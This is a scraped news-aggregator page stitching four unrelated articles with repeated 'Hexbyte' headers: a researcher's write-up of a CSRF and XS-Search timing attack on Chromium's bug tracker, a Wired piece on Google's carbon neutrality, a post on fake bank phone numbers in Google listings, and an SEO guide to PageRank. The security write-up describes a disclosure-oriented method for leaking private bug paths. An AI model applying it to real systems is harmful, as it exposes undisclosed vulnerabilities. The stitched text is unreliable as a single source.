It didn’t take me long to notice that it was vulnerable to a CSRF attack. In other words, it was possible to force an user to download a CSV containing the results of a search query if a malicious link was accessed.

https://bugs.chromium.org/p/chromium/issues/csv?can=1&q=Restrict=View-SecurityTeam&colspec=ID

As seen in the image, there were no protections against CSRF attacks. So, for example, a request made with the “Restrict-View-SecurityTeam” tag would end up filtering the results to undisclosed security-related issues only. If a member of the Google security team or a high profile bug reporter were to access this link, they would download a CSV containing all undisclosed issues they have access to.

Come again? A XS-Search attack?

Combining these two vulnerabilities we have all that is needed to perform a Cross-Site Search (XS-Search) attack:

  1. Capacity to perform complex search queries.
  2. Capacity to inflate the response of a search query.

The second point is particularly important. If the response of a search query matches a bug, we can make the CSV significantly bigger than a query that doesn’t.

Because of this big difference in response length, it’s possible to calculate the time each request takes to complete and then infer whether the query returned results or not. This way, we achieve the ability to ask cross-origin boolean questions.

The phrase “cross-origin boolean questions” sounds weird, but it essentially means we’re able to ask questions like “is there any private bug that matches the folder `src/third_party/pdfium/`?” and obtain the answer cross-origin. This involves several steps that will be described in the following section.

For now, the examples below demonstrate the core of the issue:

1st case — CSV generated from query “Summary: This bug exists”.
2nd case — CSV generated from query “Summary: This bug doesn’t exist”.
3rd case — CSV generated from query ”Summary: This bug exists OR Summary: This bug doesn’t exist“.

As we can see, on the first and third case we would have an arbitrarily big CSV, because both queries match a bug with summary “This bug exists”. On the second case, the CSV would be empty (containing only the header), because the query didn’t match any bug with the Summary “This bug doesn’t exist”. Note that in the third case we are using the logic operator OR to query the first and second cases together.

To ask or not to ask?

One of the problems I had when trying to create a PoC was deciding what to search. Monorail’s search doesn’t allow us to query for specific letters in a report, only words. This meant that we couldn’t bruteforce the report char by char.

After realizing this, I had to take a step back and search older bug reports looking for information that was relevant and could realistically be exfiltrated by the attack.

That’s when I learned that many Chromium bug reports indicate the file path and line number where the vulnerability can be found.

Example from https://bugs.chromium.org/p/chromium/issues/detail?id=770148

That’s perfect for a XS-Search attack: since the folder structure of Chromium is public and Monorail treats slashes as words delimiters (a query for “path/to/dir” also includes results for bugs containing the string “path/to/dir/sub/dir”), we can easily generate the appropriate search queries.

So our attack would look something like this:

  1. We find out if there’s any private bug report that mentions a file in Chromium’s souce tree. We do this using https://cs.chromium.org/chromium/src/ as the base query.
  2. We search for the first half of all the directories under src/ using the OR operator (e.g. src/blink OR src/build…).
  3. We keep repeating step 2 using the binary search algorithm. If anything was found (i.e. a big CSV was generated), we restrict the search space to the first half. Otherwise (i.e., an empty CSV was generated), we restrict the search space to the second half.
  4. After eliminating all directories but one, we restart step 2, but now adding the newly found directory to the end of the base query.

At the end of this process, the full URL will have been leaked and we can now (as an attacker) look into the corresponding file and try to find the vulnerability that was reported.

One request to rule them all

You might be wondering how we obtained the size of the CSV in step 3. Since the Same-Origin policy forbids us from accessing information across different origins, a naive response.length won’t work.

While we can’t know for sure the exact size of a response, we can measure the time each request takes to complete. Using the response-length inflation technique covered in previous sections, searches returning a bug would be a lot slower to finish than ones that do not.

However, to achieve a high degree of certainty, simply doing one request isn’t enough. We would need to request the same page many times and measure the average response time to obtain a reliable exploit.

That’s when the Cache API comes in handy, by only making one request and repeatedly calculating the duration that the response takes to be cached it’s possible to infer with certainty if the result of the search query returned bugs or not.

In other words, a small response takes less time to be cached than a bigger response. Given there are almost no limitations to the Cache API (and it being extremely fast), we can cache and measure the same response several times, and then compare it with the measurements of a known empty search query result, which allows us to easily differentiate a large response from a small/empty one, filtering out hardware and network variances, increasing the exploit’s speed and reliability.

For more information on how this can be implemented you can check the exploit’s code.

Aftermath

In total, I found three different places where this attack could be carried on, which resulted in CVE-2018–10099, CVE-2018–19334 and CVE-2018–19335.

I was also rewarded $3133,7 for each vulnerability, totaling over $9400.

Contact

If you have any questions, caught some typo or something that I missed, feel free to contact me on @lbherrera_

Read More

Hexbyte  Tech News  Wired How Google Keeps Its Power-Hungry Operations Carbon Neutral

Hexbyte Tech News Wired How Google Keeps Its Power-Hungry Operations Carbon Neutral

Hexbyte Tech News Wired

Hexbyte  Tech News  Wired

Google sustainability officer Kate Brandt urges others to embrace the “circular economy.”

Callie Giovanna/TED

Kate Brandt has a radical idea for how we’ll have to live in the future, if we’re going to be in balance with nature. She envisions a world without landfills, where ownership is obsolete, and everything down to the socks on our feet is rented and shared. Brandt is Google’s sustainability officer. And she’s obsessed with one idea: the “circular economy,” which aims to eliminate waste. This would require products and materials to be kept in use, rather than thrown away, and for the world to be powered by renewable energy.

At Google, Brandt is employing this ethos at scale. At TEDWomen 2018, a conference for women thought leaders in Palm Desert, California, this week, she issued a challenge to the rest of the tech industry to do the same.

The timing is good—and necessary. A recent report from the US government paints a dire picture of what will happen to our planet if we don’t aggressively counteract climate change in the next decade. That’s in line with the UN’s report from October,which concluded that humans have about 12 years to reverse current trends before we do irreversible harm.

Brandt is focused on implementing this vision at the buildings that house Google employees and at Google’s 14 data centers around the globe. The company has been carbon-neutral since 2007, which requires a lot of work to offset its substantial power demands. Google achieves this three ways, according to its most recent Environmental Report: by reducing its demand, by buying renewables to match its use of non-renewable energy, and with other offsets, like capturing methane gas from animal waste.

Data centers are a large source of emissions. According to a recent report in the journal Nature, data centers use 200 terawatts of energy a year—roughly 1 percent of global electricity use.

Google estimates that each search emits roughly 0.2 grams of CO2 into the atmosphere, due to the energy it takes to power the cables, routers, and servers that make Google work. That’s on par with the energy it takes to power a lightbulb for 17 seconds. Watching or uploading a video to YouTube is worse for the environment: 1 gram of carbon for every 10 minutes of viewing, according to The Guardian. Experts estimate that internet companies put out as much CO2 as the airline industry.1

As Google grows, “We are committed to neutralizing all the carbon emissions associated with our operations,” Brandt says. That sounds great, but how do you actually do it?

“First we applied machine learning to the cooling of data centers,” Brandt says, cutting energy use by the cooling system by 30 percent.

Google designed servers that will last longer and be easier to reuse. “We are taking components from old servers, and we are keeping them in our new machines. We’re remanufacturing new servers from old ones. And we sell old servers on secondary markets after wiping them clean,” she says. In 2017, that meant 18 percent of Google’s new servers were remanufactured machines, and 11 percent of components used for machine upgrades were refurbished inventory. The company sold more than 2 million used machines to others.

Google also bought 3 gigawatts of wind and solar last year to offset the energy use of its data centers, allowing the company for the first time to match 100 percent of its energy use with renewables. Though that tactic has long been a component of its carbon-neutral effort, 2017 was the first year it was able to buy enough clean energy to offset all its data center energy consumption. “For every kilowatt-hour of energy we consume, we add a matching kilowatt-hour of renewable energy to a power grid somewhere,” Urs Hölzle, a Google senior vice president, wrote in a blog post earlier this year.

Google is far from alone in embracing the circular economy. Nike, Brandt points out, is designing out waste in how it harvests materials and makes products. She points also to Renault and Walmart as companies embracing reusable materials and 100 percent renewable energy, respectively. “But no one else in the data center industry is applying this circular approach at scale,” she says.

Though she doesn’t call them out specifically, streaming services could have a huge impact if they answered Brandt’s call, since streaming services like Netflix account for a majority of global broadband traffic. Greenpeace has singled out Netflix for not making commitments to reduce its climate impact. Amazon has taken heat for not being open about its sustainability efforts and climate impacts, recieving an F rating in 2016 from the Carbon Disclosure Project, which called it out as the largest US company to refuse transparency. Netflix and Amazon did not respond to requests for comment.

Microsoft doesn’t call it a circular economy approach, but it’s been making big strikes on sustainability for the past six years. Microsoft created an internal carbon tax to help reduce its emissions. Since implementing it in 2012, the company has been carbon-neutral, and it has pledged to cut its absolute emissions by 75 percent by 2030.

The good news is that the circular economy is an idea whose time may have come. The urgency of recent climate reports has led not just a handful of companies to embrace the idea of renewable and circular manufacturing, but also countries. The European Union’s parliament embraced it this year and is considering advancing broader circular economy goals. Japan and China are both introducing circular goals into their economies.

Getting more businesses to buy in is a hard ask. But it’s potentially a profitable one. “Today we have so many materials that are used once. There is still so much intrinsic value that is left in those materials, but we aren’t designing them to retain that value,” Brandt says. She points to a recent study estimating that if industry embraced a circular economy, it could boost economic output by $4.5 trillion by 2030, by cutting down on the cost of buying new materials in favor of reusing and remanufacturing existing materials. There’s a symmetry to that year: It’s the deadline after which the UN estimates humans will not be able to recover from the climate impacts we’ve had on Earth. By embracing the circular economy, Brandt hopes humans can mitigate disaster without even losing money in the process.

1 CORRECTION, Dec. 1, 8:10 PM: An earlier version of this story included an outdated estimate for the CO2 emissions for each search.


More Great WIRED Stories

Read More

Hexbyte  Hacker News  Computers New form of Google banking scam

Hexbyte Hacker News Computers New form of Google banking scam

Hexbyte Hacker News Computers

A few days ago, a cousin of mine called me. He had just had INR 9000 (~$125) wiped from his account to a telephone banking scam. So how did this educated and tech savvy guy in his 20s, well aware of such scams end up in this situation?

He had fallen prey to an innovative type of scam that is plaguing multiple businesses listed on Google. Often when you search for a business on Google, you will see a card for it. It contains details like address, timings, and a phone number with the option to call them directly from the browser/app itself. This is similar to what my cousin saw when he searched for his local bank branch on Google.

Hexbyte  Hacker News  Computers pnbBusiness card of the bank visible on Google

Pay close attention to the phone number listed on the screen. (Do not call it! It belongs to a scammer.) Upon calling that number for help regarding a failed online transaction, my cousin was greeted by a person pretending to be a bank employee. After a short conversation where my cousin explained his issue, he was asked for his card number and CVV. Trusting the scammer, he ended up giving the details and subsequently lost the entire sum in his account.

Now I do understand that most would blame the person giving out his card details for being foolish enough to do so. I concur. However, in this the victim is not as much to blame for trusting the scammer as he is for trusting Google to provide him accurate information.

As we grow ever more reliant on technology, there is a subtext of trust that underlies every interaction we make via any app or website. When you see any information listed on a website, your first reaction isn’t to immediately question whether or not that information is accurate. It is to blindly trust the technology that has helped you unfailingly countless times in the past. That is precisely why this scam is so potent.

On further investigation we realised that the same scammer had his phone number registered for multiple bank branches in the same region. This is partly because of how easy it is to claim a business on Google. I did not want to do anything illegal or harmful for the sake of an article so I did not try it out myself. But as explained in this video, it is fairly easy and there seems to be little to no verification. I am sure Google has resolved such conflicts in the past where an original business owner had his/her business falsely claimed by someone else. However their method seems to be to appeal to the current owner to add you as an admin / transfer ownership. In case that doesn’t work, you appeal directly to Google to transfer ownership to you. It does seem to be a mess but I hope it works in most cases. Again, there is a lot of trust even from Google’s side that people won’t claim businesses they don’t own. There does not seem to be channel to report fraudsters such as these – you can only request ownership transfer if you own the business.

What can be said of an Indian public sector bank though? Technically they cannot be held liable for any incorrect information that does not appear on their own website. I doubt they’d care enough to go through Google’s appeal process. My fears were further confirmed when I decided to look up my local SBI branch on Google.
Hexbyte  Hacker News  Computers sbiBusiness card of my local bank on Google

There are multiple reviews claiming the listed number is fake. As of now, both fake numbers are still listed. A lot of information you see on Google is user contributed and often not vetted by any human. So do think twice next time you trust any information listed on Google. And if it’s a bank phone number, definitely don’t.

Know of any other such deceptive scam methods? Tell me about it.

EDIT (26/11/2018) : Since the time of publishing of this post, reports of this scam have been published by multiple news outlets-

Read More

Hexbyte  Hacker News  Computers Google PageRank is NOT Dead: Why It Still Matters in 2018

Hexbyte Hacker News Computers Google PageRank is NOT Dead: Why It Still Matters in 2018

Hexbyte Hacker News Computers

Have you been involved in SEO for more than a couple of years? You probably remember Google’s Toolbar PageRank.

Here’s what it looked like:

It showed the Google PageRank of every page you visited on a logarithmic scale from 0–10.

But even before Google officially removed support for Toolbar Pagerank in 2016, they had already ceased to update it for many years. For this reason, some SEOs view PageRank as an outdated and irrelevant metric that has no place in modern‐day SEO.

Here’s a comment I found on another article about PageRank that sums up this way of thinking:

Hexbyte  Hacker News  Computers pagerank image

Pretty brutal. But here’s the thing: PageRank still plays a vital role in Google’s ranking algorithm.

How do I know this? Google said so.

DYK that after 18 years we’re still using PageRank (and 100s of other signals) in ranking?

Wanna know how it works?https://t.co/CfOlxGauGF pic.twitter.com/3YJeNbXLml

— Gary “鯨理” Illyes (@methode) February 9, 2017

(Gary Illyes works for Google. So that tweet is straight from the horse’s mouth, so to speak.)

But this year‐old tweet isn’t my only evidence. Just a month ago, Gary Illyes spoke at a conference I attended in Singapore (here’s me with him!). In his talk, he reminded the audience that PageRank is still a part of their algorithm; it’s just that the public score (i.e., Toolbar PageRank) no longer exists.

With that in mind, the aim of this post is threefold:

  1. To set the record straight about the importance and relevance of PageRank in 2018;
  2. To explain the basics of the PageRank formula;
  3. To discuss other similar metrics that exist today, which may make suitable replacements to the deprecated public PageRank “score.”

Hexbyte Hacker News Computers What is Google PageRank?

PageRank (PR) is a mathematical formula that judges the “value of a page” by looking at the quantity and quality of other pages that link to it. Its purpose is to determine the relative importance of a given webpage in a network (i.e., the World Wide Web).

Google co‐founders Sergey Brin and Larry Page devised PageRank in 1997 as part of a research project at Stanford University. They described their motivation as follows:

Our main goal is to improve the quality of web search engines.”

That brings us to an important point: Search engines weren’t always as efficient as Google is today. Early search engines like Yahoo and Altavista didn’t work very well at all. The relevance of their search results left a lot to be desired.

Here’s what Sergey and Larry said about the state of search engines in their original paper:

Anyone who has used a search engine recently can readily testify that the completeness of the index is not the only factor in the quality of search results. “Junk results” often wash out any results that a user is interested in. ”

PageRank aimed to solve this problem by making use of the “citation (link) graph of the web,” which the duo described as “an important resource that has largely gone unused in existing web search engines.”

The idea was inspired by the way scientists gauge the “importance” of scientific papers. That is, by looking at the number of other scientific papers referencing them. Sergey and Larry took this concept and applied it to the web by tracking references (links) between web pages.

It was so effective that it became the foundation of the search engine we now know as Google, and it still is.

Hexbyte Hacker News Computers How does Google PageRank work?

Here’s the full PageRank formula (and explanation) from the original paper published in 1997:

We assume page A has pages T1…Tn which point to it (i.e., are citations). The parameter d is a damping factor which can be set between 0 and 1. We usually set d to 0.85. There are more details about d in the next section. Also C(A) is defined as the number of links going out of page A. The PageRank of a page A is given as follows:

PR(A) = (1‐d) + d (PR(T1)/C(T1) + … + PR(Tn)/C(Tn))

Note that the PageRanks form a probability distribution over web pages, so the sum of all web pages’ PageRanks will be one.

Confused? Let’s simplify.

Google takes into account three factors when calculating the PageRank of a web page, which are:

  • The quantity and quality of inbound linking pages;
  • The number of outbound links on each linking page;
  • The PageRank of each linking page.

Let’s say that page C has two links: one from page A and one from page B. Page A is stronger than page B, and also has fewer outgoing links. Feed this information into the PageRank algorithm, and you get the PageRank of page C.

Hexbyte  Hacker News  Computers

The PageRank formula also has a so‐called “damping factor” which simulates the probability of a random user continuing to click on links as they browse the web. This is perceived to decrease with each link click.

Think of it like this: The probability of you clicking a link on the first page you visit is reasonably high. But the likelihood of you then clicking a link on the next page is slightly lower, and so on and so forth.

With that in mind, the total “vote” of a page is multiplied by the “damping factor” (generally assumed to be 0.85) with each iteration of the PageRank algorithm.

If the BBC links to a page via four “link‐hops,” the value of that link would be “damped down” to such an extent that the final page would hardly feel the benefit. But if they link to that same page via only two link‐hops, that link will have a strong influence on the page.

Hexbyte  Hacker News  Computers

Editor’s note

You might be wondering:

What if we didn’t know the PageRank of page A or page B?”

This would be like asking the following question:

If Sergey gives half of his money to Larry, how much money does Larry have?

You can’t answer this question because a vital piece of information is missing: The amount of money Sergey had in the first place.

It’s a crude analogy, yes, but it relates to the PageRank algorithm because to calculate the PageRank of every other page in the network, you first need to know the PageRank of at least one page, right?

So how does Google overcome this problem?

Here’s another excerpt from the original PageRank paper:

PageRank or PR(A) can be calculated using a simple iterative algorithm and corresponds to the principal eigenvector of the normalized link matrix of the web.

Sound like gobbledygook?

It basically means that Google’s PageRank algorithm can calculate the PR of a page without knowing the definitive PageRank of the linking pages. This is because PageRank isn’t really an absolute “score,” but rather a relative measure of a webpage’s quality compared to every other page on the link graph (i.e., web).

Read this article if you want to geek out and learn more.

Hexbyte  Hacker News  Computers Joshua Hardwick

Hexbyte Hacker News Computers Why did Google remove the public PageRank score?

Here’s what a Google spokesperson said in 2016:

As the Internet and our understanding of the Internet have grown in complexity, the Toolbar PageRank score has become less useful to users as a single isolated metric. Retiring the PageRank display from Toolbar helps avoid confusing users and webmasters about the significance of the metric.

But there was almost certainly another contributing factor to the decision: link spam.

It’s fair to say that SEOs have long been obsessed with PageRank as a ranking factor, perhaps because the so‐called “toolbar PageRank” offered a visible gauge, quite literally, as to the rank worthiness of a webpage.

No such visual gauge existed for any other ranking factors, which made it seem like PageRank was the only factor that mattered. As a result, people soon started buying and selling “high PR” links. It became a huge industry, and still is.

Hexbyte  Hacker News  Computers fiverr junk links

some “high PR” links for sale on Fiverr right now

If you’re wondering how link sellers build these “high PR” links in the first place, there are many ways. In the mid‐2000s, one of the primary acquisition tactics was to leave blog comments.

For Google, this was a big problem. Links were originally a good judge of quality because they were given out naturally to deserving pages. Unnatural links made their algorithm less effective at discerning the high‐quality pages from the low‐quality ones.

The introduction of “nofollow”

In 2005, Google partnered with other major search engines to introduce the “nofollow” attribute. That solved blog comment spam by allowing webmasters to stop the transfer of PageRank via specific links (e.g., blog comments).

Here’s an excerpt from Google’s official statement on the introduction of “nofollow”:

If you’re a blogger (or a blog reader), you’re painfully familiar with people who try to raise their own websites’ search engine rankings by submitting linked blog comments like “Visit my discount pharmaceuticals site.” This is called comment spam, we don’t like it either, and we’ve been testing a new tag that blocks it. From now on, when Google sees the attribute (rel=“nofollow”) on hyperlinks, those links won’t get any credit when we rank websites in our search results.

Nowadays, almost all CMS systems “nofollow” blog comment links by default.

But as Google solved one problem, another problem was made accidentally worse.

PageRank sculpting

The original PageRank formula states that PageRank is divided equally between the outgoing links on a webpage. So if the PageRank of a page is y and the page has ten outgoing links, the amount of PageRank transferred via each link is y/10.

But what happens if you add a “nofollow” attribute to 9 of those 10 links? Surely it stops the flow of PageRank to nine of those pages, leaving the full PageRank value to be transferred via only one link on the page, right?

Hexbyte  Hacker News  Computers

Initially, yes, this was the case, and webmasters soon began selectively adding the ‘nofollow’ attribute to pages they deemed less important (e.g., outgoing links, etc.). This allowed them to effectively “sculpt” the flow of PageRank around their site.

For example, if they had a page with a PageRank score of 7 (according to the public PR score on the toolbar), and they wanted to boost the “power” of a specific page, they would just link to it from the high PR page and “nofollow” all the other links on the page. That way, the maximum amount of PageRank would be sent to their page of choice.

Google made changes to this in 2009. Here’s an excerpt from Matt Cutts’ blog post on the matter:

So what happens when you have a page with “ten PageRank points” and ten outgoing links, and five of those links are nofollowed? […] Originally, the five links without nofollow would have flowed two points of PageRank each […] More than a year ago, Google changed how the PageRank flows so that the five links without nofollow would flow one point of PageRank each.

Here’s an illustration of the difference:

Hexbyte  Hacker News  Computers

We don’t know if this is still how the ‘nofollow’ maths works. Google made this change nine years ago. Things may be different now. It’s possible that other factors (e.g., the position of a link on a page) now also influence how much value a given link transfers.

But what we do know for sure is that adding “nofollow” tags to some links won’t help to funnel more “link juice” towards the rest of the links on the page.

Google (slowly) axes the public PageRank score

Shortly after introducing changes to the way PR is passed between so‐called ‘dofollow’ and ‘nofollow’ on a page, Google removed PageRank data from Webmaster Tools.

Then, in 2014, support for the public PageRank metric took another blow when Google’s John Mueller stated that people should stop using PageRank as it would no longer be updated.

I wouldn’t use PageRank or links as a metric. We’ve last updated PageRank more than a year ago (as far as I recall) and have no plans to do further updates. Think about what you want users to do on your site, and consider an appropriate metric for that.”

In 2016, Toolbar PageRank was officially axed.

This move made the buying and selling of “high PR links” more difficult as there was no way to find out the “true” PageRank of a webpage.

Hexbyte Hacker News Computers Is there a suitable replacement for the public PageRank score?

No replica of PageRank exists. Period.

But there are a few similar metrics around, one of which is Ahrefs’ URL Rating (UR).

Sidenote.

Moz and Majestic also have some proprietary metrics that work in a similar way to PageRank. Feel free to check out the documentation on their creators’ websites to learn more. In this article, however, we’ll only be talking about Ahrefs’

URL

Rating (

UR

) because it’s a metric that we fully understand and trust.

What is URL Rating?

Ahrefs’ URL Rating (UR) is a metric that shows how strong a backlink profile of a *target URL* is on a scale from 1 to 100.”

How do you see the URL Rating of a page? Just paste it into Site Explorer.

Hexbyte  Hacker News  Computers url rating

Or use Ahrefs’ SEO toolbar.

Hexbyte  Hacker News  Computers url rating ahrefs toolbar

How is URL Rating (UR) similar to PageRank?

We want to be transparent here, so it’s important to note that while we calculate URL Rating (UR) in a similar way to the original version of Google PageRank, it’s not the same. Nobody outside of Google knows how the PageRank formula has developed over the years.

But we do know that URL Rating (UR) is comparable to the original Google PageRank formula in the following ways:

  • We count links between pages;
  • We respect the “nofollow” attribute;
  • We have a “damping factor”;
  • We crawl the web far and wide (which is a critical component when calculating an accurate link‐based metric)

Remember: This is how URL Rating (UR) compares to the original PageRank formula. Google has almost certainly iterated and improved upon their formula in the 21 years since its inception.

How do we know this? Well, for a start, it’s a reasonable assumption to make. We know Google hasn’t stood still all this time because their search results are by far the best of any search engine.

But here’s a quote from Matt Cutts, which I found, once again, in his 2009 blog post on PageRank sculpting:

Even when I joined the company in 2000, Google was doing more sophisticated link computation than you would observe from the classic PageRank papers. If you believe that Google stopped innovating in link analysis, that’s a flawed assumption. Although we still refer to it as PageRank, Google’s ability to compute reputation based on links has advanced considerably over the years.”

How does URL Rating (UR) differ from Google PageRank?

Google has filed many patents over the years, which are publicly accessible. But nobody, not even Bill Slawski, knows which factors are part of the live algorithm or how much weight they each receive.

This fact alone makes it very difficult to know how URL Rating (UR) differs from the current iteration of Google PageRank because we don’t fully understand how Google judges the value of a link in 2018.

Even when it comes to seemingly basic things, like the way links get counted, things aren’t as straightforward as you might assume. To illustrate, take a look at this image:

Hexbyte  Hacker News  Computers

This is a great test when interviewing SEOs.

Ahrefs’ crawler counts eight links to page B, but not every crawler works the same way.

We have no clue how Google counts them.

Furthermore, the actual counting of links is only one part of the equation. When you start calculating how much value each of those links passes, the complexity reaches a whole new level.

Here are some other questions we don’t know the answers to:

1. Does the transfer of PageRank vary according to the location of the link on the page?

Google’s reasonable surfer patent indicates that this may be the case.

In particular, it’s thought that links higher up in the document may transfer more PageRank than those lower down. Same goes for links in the sidebar vs. links in the main content.

Hexbyte  Hacker News  Computers

Bill Slawski lists some other features that Google may use to evaluate the importance of a link in his analysis here.

2. Do internal links transfer PageRank in the same way as external links?

Google’s reasonable surfer patent does give some indication that this may be the case.

Bill Slawski also talks about this in his analysis of the patent.

However, there is no definitive answer to this question. Just because it exists in a Google patent doesn’t mean that it’s part of the live algorithm. Google has filed a lot of patents over the years.

3. Does the first link from a site transfer more value than any subsequent links from the same site?

Bill Slawski states that subsequent links from the same site “might possibly be ignored when scores for pages are calculated.”

We also found a clear positive correlation between the number of unique referring domains and organic traffic when we analysed nearly 1 BILLION webpages.

Hexbyte  Hacker News  Computers referring domains vs organic search traffic ahrefs content explorer

4. …

Honestly, we could list unknowns like this all day. (If you’re interested, this article from Moz talks about more reasons why all links may not be created equal.)

Should you use URL Rating (UR) as a PageRank alternative?

URL Rating (UR) is a decent replacement metric for PageRank because it has a lot in common with the original PageRank formula.

However, it’s not a panacea. We know for a fact that URL Rating (UR) doesn’t take into account as many factors as the modern‐day iteration of Google PageRank.

So, our advice is to use it, but not to rely on it entirely. Always review link targets manually (that means visiting the actual page) before pursuing a link.

Hexbyte Hacker News Computers How to preserve (and boost) your PageRank

Before I start with this section, I want to stress an important point:

This is not about optimizing for PageRank or URL Rating (UR). That way of thinking often leads to poor decision making. The real task is to make sure that you’re not losing or wasting PageRank on your site.

For that, there are three areas to focus on:

  1. Internal links: How you link the pages together on your website affect the flow of “authority” or “link juice” around your site.
  2. External links: Both URL Rating (UR) and PageRank effectively share authority between all outbound links on a page. But this doesn’t mean you should delete or “nofollow” external links. (Keep reading.)
  3. Backlinks: Backlinks bring so‐called “link juice” into your site, which you should carefully preserve.

Let’s look at each of these individually.

Internal linking

Backlinks aren’t always within your control. People can link to any page on your site they choose, and they can use whatever anchor text they like.

But internal links are different. You have full control over them.

Seriously: Internal linking is a topic large enough to warrant an article of its own (let us know if you want us to write this!), but here are a few internal linking best practices to get you started:

1. Keep important content as close to your homepage as possible

Your homepage is almost certainly the strongest page on your site.

Don’t believe me? Do this:

Site Explorer > enter your domain > Best by Links

Hexbyte  Hacker News  Computers best by links

I’ll bet that your homepage is at the top of the list.

This is almost always the case for two reasons:

  1. Most backlinks will point to your homepage: Just look at the referring domains column on that report. You’ll most likely see that the number of links to your homepage is the highest of all pages on your site.
  2. Most sites link back to their homepage from all other pages: See the Ahrefs logo in the top left‐hand corner of this page? It links to our homepage. And it exists on all pages on our site. Most sites have a similar structure.

So the closer a page is to your homepage (in terms of the internal linking structure), the more “authority” it will receive. That’s why it pays to place important content as close to the homepage as possible.

You can find out how far away from the homepage a particular page is by running a site crawl in our Site Audit tool. Learn how to do that in this video.

https://www.youtube.com/watch?v=G_9-AkZch4k

Once you’ve done that, go to:

Site Audit > select project > select crawl > Data Explorer

Hexbyte  Hacker News  Computers site audit depth

Look at the “Depth” column, which tells you how many clicks away each page is from the homepage (assuming that’s where you started your crawl).

You can even sort the “Depth” column in descending order to see pages that are super far away from the homepage.

But let’s face it, you can’t link to every page from your homepage, right?

The good news is that your homepage is not the only high‐value page on a site capable of transferring authority to other pages. If you’re desperate to send more “link juice” to a specific page on your site, do this:

  1. Use the Best by Links report to find the most high‐authority pages on your site;
  2. Link to the page you’re trying to ‘boost’ from any relevant high‐UR pages

For example, looking at the Best by Links report for the Ahrefs blog, I see that our list of SEO tips has a high UR.

Hexbyte  Hacker News  Computers seo tips ahrefs

I also know that we mention PageRank in this article…

Hexbyte  Hacker News  Computers pagerank seo tips

… so this is an entirely relevant, high‐UR page from which we could link to this very page.

Editor’s note

Here’s a quick trick for finding the most relevant high‐UR pages from which to add internal links to newly‐published blog posts.

Go to Google and use the following search operator:

site:yourdomain.com “topic of the page we want to link to internally”

For example, if we wanted to find internal link opportunities for this page, we could search:

site:ahrefs.com/blog “pagerank”

This unveils all our blog posts that mention the word “PageRank,” of which there are 22.

Hexbyte  Hacker News  Computers pagerank results

But which of these pages would give the most powerful internal links?

Let’s use Chris Ainsworth’s SERP scraper to scrape the results, then paste them into Ahrefs’ Batch Analysis tool and sort by URL Rating (UR).

Hexbyte  Hacker News  Computers ahrefs batch analysis url rating

Cool. Now we have a list of the most authoritative pages that mention the word “PageRank.” We can add internal links to this guide from a few of these pages, like so:

Hexbyte  Hacker News  Computers pagerank link

Internal link to this post from our list of SEO tips.

Hexbyte  Hacker News  Computers Joshua Hardwick

2. Fix “orphan” pages

PageRank flows throughout a site via internal and external links. Which means that “link juice” can only reach a page if it’s actually linked‐to from one or more pages on the site.

If a page doesn’t have any inlinks, it’s referred to as an orphan page.

To find such pages, you first need a list of all the web pages on your site. Doing this can be a little tricky, but extracting the pages from your sitemap will often do the trick. You may also be able to download a full list of web pages generated by your CMS.

Once you have that, crawl your website in Ahrefs’ Site Audit tool, then go to:

Site Audit > Data Explorer > Is valid (200) internal HTML page = Yes

Hexbyte  Hacker News  Computers site audit valid html

Export this report, which will contain all the URLs found on your site during the crawl.

Now, compare the URLs in this report with the full list of pages on your site. Any pages that the crawl did not uncover are most likely orphan pages.

You should fix such pages by either removing them (if they’re unimportant) or adding internal links to them (if they are important).

External linking

Many people feel that linking out to external resources (i.e., web pages on other sites) will somehow hurt their rankings.

That is not true. External links won’t hurt you, so you should not be worried about linking to other sites. We regularly link out to useful resources from the Ahrefs Blog, and our traffic is consistently rising.

Hexbyte  Hacker News  Computers organic traffic ahrefs blog

It is true that the more links you have on a page, the less “value” each link will transfer. But we’re pretty sure that in 2018, calculating the value of each link on a page is not as straightforward as it was back in the mid-1990’s when Google filed the original PageRank patent.

So, while you can hoard links and not link out to anyone, that doesn’t mean that Google will reward you for doing so. Not linking out to any external resources whatsoever looks seriously fishy and manipulative for a start, and we know Google doesn’t respect that kind of practice.

Bottom line? External links exist because they serve a purpose; they point readers to resources that add to the conversations. You should, therefore, link out whenever it is helpful to do so.

Here are a few external linking best practices to follow:

1. Don’t “nofollow” external links unless you need to

Here’s what Google says about “nofollow” links:

In general, we don’t follow them. This means that Google does not transfer PageRank or anchor text across these links.

Some websites (Forbes, HuffPo, etc.) now “nofollow” all of their external links by default.

Is this good practice? Not at all.

Most of these websites chose to implement such an editorial policy because some of their writers were secretly selling links from their articles. Not wanting to encourage such practice, a blanket ban on “dofollow” external links ensued.

But chances are you don’t have this problem. Hopefully, you run a quality website and carefully vet any guest submissions. In which case, there’s no need to “nofollow” all your external links. It just doesn’t make sense to do so.

So, you should only “nofollow” external links when:

  • Linking out to questionable pages: In this case, you might want to question whether you should be linking to that resource at all;
  • Linking out from a “sponsored post:” Sponsored posts are paid for, which means that any links within the post are effectively paid links. This is exactly what the “nofollow” attribute is for.

2. Fix broken external links

Broken external links contribute to a bad user experience. Here’s what happens when a reader clicks such a link:

Hexbyte  Hacker News  Computers dead link quicksprout

These links also ‘waste’ PageRank.

Think about it: The link has no value to anyone, yet it dilutes the value of the rest of the links on that page.

How do you fix these? You first need to find them.

Read this post to learn everything you need to know: How to Find and Fix Broken Links (to Reclaim Valuable “Link Juice”)

Backlinks

Backlinks boost the PageRank of the linked‐to page. For example, backlinko.com links to our on‐page SEO guide and thus increases its PR.

But as discussed earlier, not all backlinks are created equal. Google looks at hundreds of factors to determine the real value of a backlink.

That said, here are a few useful hacks to get the most out of your backlinks:

1. Focus on building links from high‐UR pages

PageRank flows between pages, not domains.

A link from a high‐authority page on a low‐authority website will be worth more than a link from a low‐authority page on a high‐authority website.

Hexbyte  Hacker News  Computers

So when vetting link prospects in Site Explorer, we recommend sorting by URL Rating (UR):

Hexbyte  Hacker News  Computers url site explorer

If you found your prospects elsewhere (e.g., via a Google scrape), it’s worth pasting them into our Batch Analysis tool to check the URL Rating of each page.

Sidenote.

You can use a tool like

URL Profiler

 to pull

URL

Rating—and other Ahrefs metrics—for thousands of pages in one go.

2. Fix broken pages that waste “link juice”

Backlinks not only boost the “authority” of the page they point to, but also every internally‐linked page on the site. Reason being, PageRank flows from page to page via internal links.

But if you have backlinks pointing to a broken page, any “link juice” is effectively wasted because it has nowhere to flow from there.

You should, therefore, fix any broken pages with backlinks pointing to them. You can find such pages by adding a “404 not found” filter to the Best by links report.

Site Explorer > enter your domain > Best by links > add a 404 filter

Hexbyte  Hacker News  Computers broken pages

This shows you all the broken pages on your site, plus the number of links they each have.

